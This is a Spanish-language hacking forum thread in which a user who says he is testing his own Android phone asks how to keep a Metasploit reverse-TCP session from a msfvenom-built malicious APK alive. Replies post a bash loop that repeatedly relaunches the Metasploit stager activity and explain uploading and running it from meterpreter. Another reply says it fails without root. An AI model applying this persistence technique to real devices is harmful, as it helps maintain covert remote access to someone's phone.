Persistencia en Android - APK maliciosa

Iniciado por tobiasasa, Agosto 13, 2020, 09:53:58 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 13, 2020, 09:53:58 PM Ultima modificación: Agosto 13, 2020, 10:28:10 PM por Denisse
Buenas noches, he estado probando vulnerar mi celular android de diferentes formas y por el momento la de crear una apk con msfvenom parece la mas conveniente (si alguien conoce alguna mejor por favor resomendarla),
el problema es el siguiente: al abrir la APK se hace la conexion reverse TCP con metasploit correctamente pero, al cabo de 2 minutos, o al bloquear el celular, se cierra la sesion,
he estado leyendo e intente hacer una persistencia con el siguiente script:
Código:

Código: text
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done


el problema es que sigue sin funcionar, al bloquear el celular, reiniciar el telefono, o por nada la sesion se sigue cerrando, mi idea era poder descargar la APK y que ya quede una sesion permanente mandando la informacion de los puertos, no se si existe alguna manera, o si deberia plantear el problema desde otro punto de vista, muchas gracias!
Agosto 14, 2020, 12:18:34 AM #1 Ultima modificación: Agosto 14, 2020, 12:32:09 AM por 24bpg
Creas la persistencia aqui te dejo el codigo:

Código: text

#!/bin/bash
while true:
    do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 15
done


En la shell del sistema vulnerado te mueves hasta la ruta:

    /data/data/com.metasploit.stage/files

Para luego proceder a subir la persistencia (comando upload desde meterpreter) y correrla con el comando:
   
    sh You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La persistencia deberia funcionar aún con el reinicio del sistema.
Agosto 14, 2020, 12:26:29 AM #2
No funciona si el móvil no está rooteado. Y a partir de Nougat (7.1.2) ni hablar.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Agosto 14, 2020, 09:55:18 AM #3
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login lo he probado y sigue caducandose la sesión, hasta he probado ponerlo en el ini.d, luego de ponerlo en sdcard/download para que inicie el script con el movil, pero no hay manera, existe alguna otra alternativa para que no se cierre la sesion?
O algun otro tipo de vulnerabildiad para android que sea persistente?
Muchas gracias
Imprimir
Ir Arriba Páginas1
Acciones del Usuario